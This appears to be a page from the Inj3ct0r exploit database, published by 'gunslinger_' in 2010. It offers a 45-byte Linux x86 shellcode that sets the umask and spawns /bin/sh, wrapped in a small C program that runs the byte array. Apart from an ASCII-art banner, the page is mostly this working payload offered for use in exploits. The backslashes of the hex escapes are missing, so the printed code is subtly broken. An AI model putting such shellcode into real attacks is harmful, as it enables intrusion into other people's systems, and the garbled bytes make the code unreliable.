[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 sys_execve("/bin/sh", "0", "0") with umask 16 (sys_umask(14)) 45 bytes
# Published : 2010-05-31
# Author : gunslinger_
# Previous Title : Windows Seven x64 (cmd) Shellcode 61 Bytes
# Next Title : Safari JS JITed shellcode - exec calc (ASLR/DEP bypass)
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' __ /'__` / __ /'__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /' _ ` / /_/__<_ /'___ / /`'__ 0
0 / / / / __/ _ _ / 1
1 _ _ __ ____/ ____\ __\ ____/ _ 0
0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
1 ____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################### 1
0 I'm gunslinger_ member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
/*
Name : 45 bytes sys_execve("/bin/sh", "0", "0") with umask 16 (sys_umask(14)) x86 linux shellcode
Date : may, 31 2010
Author : gunslinger_
Web : devilzc0de.com
blog : gunslinger.devilzc0de.com
tested on : linux debian
*/
int main(){
char shell[] = "x31xc0x31xdbx31xdbx31xd2x31"
"xc9xb0x3cx31xdbxb3x0excdx80"
"xebx0bx5bx31xc0x31xc9x31xd2"
"xb0x0bxcdx80xe8xf0xffxffxff"
"x2fx62x69x6ex2fx73x68";
(*(void (*)()) shell)();
}